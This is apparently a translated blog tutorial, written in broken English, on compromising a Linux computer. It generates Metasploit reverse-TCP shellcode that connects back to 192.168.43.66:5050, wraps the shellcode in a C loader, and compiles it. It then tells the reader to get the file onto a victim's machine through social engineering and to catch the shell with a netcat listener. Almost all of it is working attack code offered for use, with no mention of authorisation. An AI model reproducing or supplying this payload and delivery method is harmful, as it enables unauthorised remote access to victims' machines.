This time we will do exploit the linux operating system, my friend may feel that linux is the most secure operating system is universal, but I said no, because there is no system in the world's safest, most ngak if the system is impenetrable ngak just use social engginer , ato administrator wrote kidnapped, then we ask hehehe .. The following example exploitasinya.
1. Get exploit code.
root@bt:~# cd /pentest/exploits/framework/
root@bt:/pentest/exploits/framework# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.43.66 LPORT=5050 C
/*
* linux/x86/shell_reverse_tcp - 71 bytes
* http://www.metasploit.com
* VERBOSE=false, LHOST=192.168.43.66, LPORT=5050,
* ReverseConnectRetries=5, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependChrootBreak=false, AppendExit=false,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
root@bt:/pentest/exploits/framework#
2. Create a file exploit.
Open gedit then copy the result of the exploit code that we get.
edit to be like this fits under.
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x68\xc0\xa8\x2b\x42\x66\x68\x13\xba\x66\x53\x6a\x10"
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f"
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) buf;
(int)(*funct)();
}
save it exploitbacktrack.c
3. Compile file exploit.
root@bt:~# gcc -o exploitbacktrack exploitbacktrack.c
root@bt:~#
4. Use Social engginer exploit file that floated to the target computer.
5. Open a new terminal and create a listener to wait for our exploit file dieksekusi.
root@bt:~# nc -lvp 5050
6. AndTarrrrraaaaaaaaaaaaaaaaaaaaaaa !!
